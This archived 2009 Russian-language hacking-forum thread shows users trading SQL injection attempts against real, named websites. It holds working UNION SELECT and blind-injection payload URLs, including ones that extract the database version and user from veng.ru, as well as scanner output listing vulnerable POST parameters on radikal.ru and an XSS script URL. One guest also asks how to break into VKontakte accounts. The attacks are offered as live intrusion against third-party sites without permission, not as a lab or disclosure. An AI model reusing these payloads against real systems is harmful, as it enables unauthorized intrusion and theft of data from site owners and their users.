ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

09.01.2009, 20:02
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме: 3152874
Репутация:
1020
|
|
Сообщение от zifanchuck
скажи сайт
или кинь в личку
А у тебя есть какие то предположения? Поделись.
|
|
|

09.01.2009, 20:05
|
|
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме: 4002393
Репутация:
464
|
|
у меня просто на днях было что ордер показывал 12 а унион говорил типа неверно.
Я перебирал униуном и нашол
|
|
|

09.01.2009, 20:11
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме: 3152874
Репутация:
1020
|
|
Сообщение от zifanchuck
у меня просто на днях было что ордер показывал 12 а унион говорил типа неверно.
Я перебирал униуном и нашол
я дошол перебором до 70 колонок, тем более что есть sql запрос - и из него видно что выбераеться 16 значений, а ладно, на ковырейте, мне просто интересно почему так -
http://manuscripts.cmrs.ucla.edu/Manuscripts_list.php?a=querysearch&value=3&whereSt ring=TRUE)+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16/*
по всей видимости это какая то бага совместого использования distinct и union, короче хз.
Последний раз редактировалось AkyHa_MaTaTa; 09.01.2009 в 20:35..
|
|
|

09.01.2009, 20:39
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме: 2238549
Репутация:
1318
|
|
AkyHa_MaTaTa, DISTINCT тут не при чём... Походу этот запрос как-то изменяется в зависимости от какого-то условия...
|
|
|

09.01.2009, 20:40
|
|
Участник форума
Регистрация: 25.12.2006
Сообщений: 220
Провел на форуме: 2544458
Репутация:
243
|
|
при поиске Blind SQL, мне сканер выдал
http://www.radikal.ru/action.aspx
The POST variable M is vulnerable
The POST variable VM is vulnerable
The POST variable V is vulnerable
http://www.radikal.ru/REGISTER/PageLostPassword.aspx
The POST variable in_reset_code is vulnerable
The POST variable in_new_pass_conf is vulnerable
http://www.radikal.ru/toadmin.aspx
The POST variable cb_type is vulnerable
что с этим сделать можно?
|
|
|

27.02.2009, 21:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
http://avalon-game.in/game/2/f_site_found.php?login=%3Cscript%3Ealert('%C8%20%F D%F2%EE%E3%EE%20%F7%E5%F0%E5%E7%20SQL%20%E8%ED%FC% E5%EA%F6%E8%FE%20%EF%F0%E8%F1%E0%ED%F3%F2.');%3C/script%3E - что это? и что дальше делать? Извените заранее если это тупо, я есчё нуб
|
|
|
|

04.03.2009, 19:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
мне нужно научится взламывать пароли и мэйлы вконтакте,помогите плиз... очень нужно
|
|
|
|

13.03.2009, 12:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Малоуважаемый vellition, ваш вопрос не в тему, так как в в файле f_site_found.php всего 5 строчек, из которых ни в одной из них нет ни слова о работе с базой данных. В данной ситуации могу посоветовать разве что прочитать книжку "PHP для бокланов".
Последний раз редактировалось telhar; 13.03.2009 в 12:36..
|
|
|
|
Помогите плиз! Совсем запарился!(( |

20.03.2009, 02:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Помогите плиз! Совсем запарился!((
http://veng.ru/index.php?page='
Что дальше что не подбирал не лез(((
Заранее благодарен!
|
|
|
|

21.03.2009, 03:41
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме: 1957988
Репутация:
739
|
|
Вот что побыстрому нарыл:
http://veng.ru/player_info.php?name=%CC%E0%F0%F2%E8'+and+substrin g(version(),1,1)=4/*
4ая версия.
http://veng.ru/player_info.php?name=%CC%E0%F0%F2%E8'+and+ascii(su bstring((select+user()),1,1))=114/*
и
http://veng.ru/player_info.php?name=%CC%E0%F0%F2%E8'+and+ascii(su bstring((select+user()),2,1))=111/*
От сюда делаю вывод что юзер root,но даже доступа к mysql.user нету т.к. даже '1' не возвращает про file_priv и password вообще молчу.
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|